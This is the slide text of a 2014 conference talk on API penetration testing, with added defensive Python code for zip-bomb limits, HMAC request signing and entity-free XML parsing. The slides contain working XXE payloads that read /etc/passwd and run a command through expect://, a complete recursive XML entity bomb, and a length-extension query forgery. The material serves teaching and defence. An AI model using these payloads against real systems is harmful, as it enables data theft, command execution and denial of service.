codefest 2014 - pentesting client/server api
http://2014.codefest.ru/lecture/696
Pentesting client/server API
Sergey Belov
$ whoami
© 2002—2014, Digital Security 2
• Senior Security Auditor at Digital Security
• BugHunter: Google, Yandex, Badoo, Yahoo +++
• Writer: habrahabr, Xakep magazine
• CTF: DEFCON 2012 CTF Final, Chaos Construction CTF’2013
• Speaker: CodeFest 2012, ZeroNights 0x03
• Trainer: Hack in Paris’2014, BlackHat’2014 USA (soon)
What are we talking about?
API
Hacking via API
From interface to API methods
What should we test?
• Logic!
• Bypassing restrictions (sqli/xss)
• Parameter tampering

Developing
• Stop hacks and custom implementation in API! Really
ZIP

42 Kb… …10 Gb? …100 Gb? …100 Tb? …4.5 Pb!
http://www.unforgettable.dk/

Say HELLO to ZIP BOMB!
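The slides above make the point that an API endpoint accepting compressed uploads has to budget for what the archive inflates to, not for what it weighs on the wire. The following is an added example (not code from the talk or from Digital Security) showing the server-side check: the declared sizes in the central directory are verified first, and then the actual decompressed byte count is enforced while streaming, because the declared numbers are attacker-controlled. The limits MAX_TOTAL_UNCOMPRESSED and MAX_RATIO and both sample archives are constructed for the example.

```python
import hashlib
import io
import zipfile

# Constructed limits for the example (not from the talk); tune them per service.
MAX_TOTAL_UNCOMPRESSED = 50 * 1024 * 1024   # 50 MiB budget for the whole archive
MAX_RATIO = 100                               # reject anything that inflates more than 100x
CHUNK = 64 * 1024


def inspect_zip(data: bytes) -> dict:
    """Archive statistics taken from the central directory (declared, untrusted sizes)."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        infos = zf.infolist()
        total_comp = sum(i.compress_size for i in infos)
        total_unc = sum(i.file_size for i in infos)
    return {"compressed": total_comp, "uncompressed": total_unc,
            "ratio": total_unc / max(total_comp, 1)}


def safe_extract_all(data: bytes,
                     max_total: int = MAX_TOTAL_UNCOMPRESSED,
                     max_ratio: int = MAX_RATIO) -> dict:
    """Decompress every member into memory while enforcing a hard byte budget.

    Check 1 (cheap, fails fast): declared uncompressed size and ratio.
    Check 2 (authoritative): count the bytes actually produced while streaming,
    since a crafted header can lie about file_size.
    Raises ValueError as soon as a limit is exceeded; returns {name: bytes}.
    """
    declared = inspect_zip(data)
    if declared["uncompressed"] > max_total or declared["ratio"] > max_ratio:
        raise ValueError("declared size/ratio exceeds limits: %r" % declared)

    out = {}
    produced = 0
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            buf = io.BytesIO()
            with zf.open(info) as member:
                while True:
                    chunk = member.read(CHUNK)
                    if not chunk:
                        break
                    produced += len(chunk)
                    if produced > max_total:
                        raise ValueError("archive inflated beyond %d bytes" % max_total)
                    buf.write(chunk)
            out[info.filename] = buf.getvalue()
    return out


def is_rejected(data: bytes, **limits) -> bool:
    """True when safe_extract_all refuses the archive under the given limits."""
    try:
        safe_extract_all(data, **limits)
    except ValueError:
        return True
    return False


def build_zip(members: dict) -> bytes:
    """Constructed test helper: {name: bytes} -> DEFLATE-compressed zip bytes."""
    bio = io.BytesIO()
    with zipfile.ZipFile(bio, "w", compression=zipfile.ZIP_DEFLATED) as zf:
        for name, payload in members.items():
            zf.writestr(name, payload)
    return bio.getvalue()


# Constructed samples: an incompressible 2 KiB upload (ratio about 1:1) and a
# run of zeros that DEFLATE shrinks roughly 1000:1, i.e. far beyond MAX_RATIO.
BENIGN_PAYLOAD = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(64))
BENIGN_ZIP = build_zip({"readme.bin": BENIGN_PAYLOAD})
BOMB_LIKE_ZIP = build_zip({"zeros.bin": b"\x00" * (8 * 1024 * 1024)})

if __name__ == "__main__":
    print("benign:", inspect_zip(BENIGN_ZIP), "rejected:", is_rejected(BENIGN_ZIP))
    print("bomb-like:", inspect_zip(BOMB_LIKE_ZIP), "rejected:", is_rejected(BOMB_LIKE_ZIP))
```

The ratio check alone is not enough: nested archives and lying headers get past it, which is why the streaming counter is the one that actually protects the process. Keep the budget well below the worker's memory and disk, and apply the same idea to any other decompression the API performs (gzip request bodies, image formats, and so on).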
The evil of JavaScript and
http://habrahabr.ru/post/186160/
Crypto

Query signing: Sign = sha*(…+DATA+…)
APIkey
But why?

Say hello again. To length extension attack

A=1&B=2&C=3  07ce36c769ae130708258fb5dfa3d37ca5a67514
TOKEN=sha1(KEY+DATA)

Some have hijacked just 1 request…

What does the attacker know?
• Original data
• Sign (token)

What does the attacker want?
Change some data / change params

A=1&B=2&C=3\x80\x00\x00…\x02&C=4

Can sign new query without API key!
Vkontakte: sig = md5(name1=value1name2=value2api_secret)
Mail.RU: sig = md5(uid + params + private_key)
http://www.vnsecurity.net/2010/03/codegate_challenge15_sha1_padding_attack

Request hijacking… How?
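The slides above show why sha1(KEY+DATA) lets a captured request be extended into a newly "signed" one. The following is an added example (not code from the talk or from any of the services named) of the server-side construction that does not have this property: HMAC over a canonicalised query, compared in constant time, with the raw query rejected up front if it carries bytes that never belong in a URL-encoded string. The weak sha1(KEY+DATA) function is included only so the two can be compared; API_SECRET and the sample query are constructed.

```python
import hashlib
import hmac
from urllib.parse import parse_qsl, urlencode

# Constructed sample secret (not from the talk). In a real service it lives in a
# secret store on the server side and is never embedded in client code.
API_SECRET = b"example-api-secret-do-not-reuse"


def canonical_query(query: str) -> str:
    """Sorted, re-encoded key=value list so client and server hash identical bytes.

    Duplicate names (for instance an appended &C=4) are kept and sorted, so a
    later value cannot silently override an earlier signed one.
    """
    pairs = parse_qsl(query, keep_blank_values=True, strict_parsing=True)
    return urlencode(sorted(pairs))


def sign_weak(key: bytes, data: str) -> str:
    """The construction from the slides, sha1(KEY + DATA), kept only for comparison.

    Merkle-Damgard hashes used this way let the digest be extended without KEY,
    which is exactly the length-extension problem the talk describes.
    """
    return hashlib.sha1(key + data.encode()).hexdigest()


def sign(key: bytes, query: str) -> str:
    """HMAC-SHA256 over the canonical query; HMAC has no length-extension property."""
    return hmac.new(key, canonical_query(query).encode(), hashlib.sha256).hexdigest()


def verify(key: bytes, query: str, token: str) -> bool:
    """Server-side check: reject odd bytes early, recompute, compare in constant time."""
    # Padding bytes such as \x80 or \x00, or anything non-ASCII, never appear in a
    # well-formed URL-encoded query, so refuse them before doing any crypto.
    if not query.isprintable() or any(ord(c) > 0x7E for c in query):
        return False
    try:
        expected = sign(key, query)
    except ValueError:            # strict_parsing: a pair without '='
        return False
    # compare_digest avoids leaking how many leading bytes matched.
    return hmac.compare_digest(expected, token)


# Constructed request: the same parameters as on the slide, signed with HMAC.
ORIGINAL_QUERY = "A=1&B=2&C=3"
ORIGINAL_TOKEN = sign(API_SECRET, ORIGINAL_QUERY)

if __name__ == "__main__":
    print("sha1(KEY+DATA):", sign_weak(API_SECRET, ORIGINAL_QUERY))
    print("HMAC token:    ", ORIGINAL_TOKEN)
    print("original ok:", verify(API_SECRET, ORIGINAL_QUERY, ORIGINAL_TOKEN))
    print("tampered ok:", verify(API_SECRET, ORIGINAL_QUERY + "&C=4", ORIGINAL_TOKEN))
```

Three properties matter here: the secret never leaves the server, so a replayed request cannot be turned into a differently parameterised one; canonicalisation means both sides agree on exactly which bytes are signed; and the constant-time comparison closes the timing side channel that a naive `==` would open. Adding a timestamp or nonce to the signed parameters additionally limits how long a captured request stays replayable.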
XML? XML entities!
DTD Example:
<!ENTITY writer "Donald Duck.">
<!ENTITY copyright "Copyright W3Schools.">
XML example:
<author>&writer;&copyright;</author>
XML entities? External Entity!

<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<foo>&xxe;</foo>

<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "expect://id" >
]>
<foo>&xxe;</foo>
XML Bombs!

<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ELEMENT lolz (#PCDATA)>
  <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
  <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
  <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
  <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
  <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
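Both the external-entity documents and the entity bomb above rely on the parser honouring DTD entity declarations. The following is an added example (not code from the talk or from Digital Security) of the "disable entities" advice applied to an API that receives XML: a thin wrapper over Python's standard-library expat parser that aborts on any DOCTYPE with an external identifier and on every entity declaration, before anything is expanded or fetched. The sample documents are constructed from the payload shapes on the slides; the parse_untrusted_xml and is_rejected_xml names are this example's own.

```python
import xml.parsers.expat as expat


class UnsafeXML(ValueError):
    """Raised when a document asks for DTD features this endpoint refuses to process."""


def parse_untrusted_xml(data: bytes, allow_doctype: bool = False) -> dict:
    """Parse client-supplied XML into a small dict tree with entity handling switched off.

    Policy:
      * no DOCTYPE at all unless allow_doctype=True, and never one with an
        external SYSTEM/PUBLIC identifier;
      * no entity declarations of any kind (internal, external, parameter), which
        blocks both XXE and recursive expansion before the first reference is seen;
      * no external entity references (belt and braces; unreachable once the
        declaration is refused, but cheap).
    Returns {"tag", "attrs", "text", "children"} for the root element.
    """
    parser = expat.ParserCreate()
    stack = [{"tag": None, "attrs": {}, "text": "", "children": []}]  # pseudo-root

    def on_doctype(name, sysid, pubid, has_internal_subset):
        if not allow_doctype or sysid is not None or pubid is not None:
            raise UnsafeXML("DOCTYPE not accepted: %s" % name)

    def on_entity_decl(name, is_param, value, base, sysid, pubid, notation):
        raise UnsafeXML("entity declaration not accepted: %s" % name)

    def on_external_entity(context, base, sysid, pubid):
        raise UnsafeXML("external entity reference not accepted: %s" % sysid)

    def on_start(tag, attrs):
        node = {"tag": tag, "attrs": attrs, "text": "", "children": []}
        stack[-1]["children"].append(node)
        stack.append(node)

    def on_end(tag):
        stack.pop()

    def on_text(text):
        stack[-1]["text"] += text

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_entity
    parser.StartElementHandler = on_start
    parser.EndElementHandler = on_end
    parser.CharacterDataHandler = on_text
    parser.Parse(data, True)          # exceptions raised in handlers propagate out of Parse
    return stack[0]["children"][0]


def is_rejected_xml(data: bytes, **policy) -> bool:
    """True when parse_untrusted_xml refuses the document under the given policy."""
    try:
        parse_untrusted_xml(data, **policy)
    except UnsafeXML:
        return True
    return False


# Constructed samples following the shapes shown on the slides.
SAMPLE_OK = b"<author><name>Donald Duck</name></author>"
SAMPLE_XXE = (b'<!DOCTYPE foo [ <!ELEMENT foo ANY > '
              b'<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>')
SAMPLE_BOMB = (b'<!DOCTYPE lolz [<!ENTITY lol "lol">'
               b'<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">]>'
               b'<lolz>&lol1;</lolz>')

if __name__ == "__main__":
    print("ok document ->", parse_untrusted_xml(SAMPLE_OK))
    for label, doc in (("xxe", SAMPLE_XXE), ("bomb", SAMPLE_BOMB)):
        print(label, "rejected:", is_rejected_xml(doc, allow_doctype=True))
```

Rejecting at the declaration is deliberately blunt: it costs nothing, it does not depend on any parser-internal expansion limit, and an API that needs no DTD loses nothing. Where the same document is later handed to a different XML library (for signature validation, XSLT, and so on), apply the same policy there too, since each parser has its own defaults.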
What are we talking about?
Man in the Middle
Examples?
2013-11-19 by Reginaldo Silva
https://www.facebook.com/BugBounty/posts/778897822124446
http://www.ubercomp.com/posts/2014-01-16_facebook_remote_code_execution
Testing:
• https://www.owasp.org/index.php/Testing_for_XML_Injection_(OWASP-DV-008)
• XXE to RCE https://gist.github.com/joernchen/3623896
Development:
• Disable entities
Finally:
• Re-test all interface restrictions;
• Specific compressions;
• JS callbacks;
• Crypto + SSL test + hardcoded credentials (hackapp.com);
• XML - XXE;
• Anything else :]
twitter.com/sergeybelove
Digital Security in Moscow: (495) 223-07-86
Digital Security in Saint Petersburg: (812) 703-15-47
Thanks for your attention! Questions?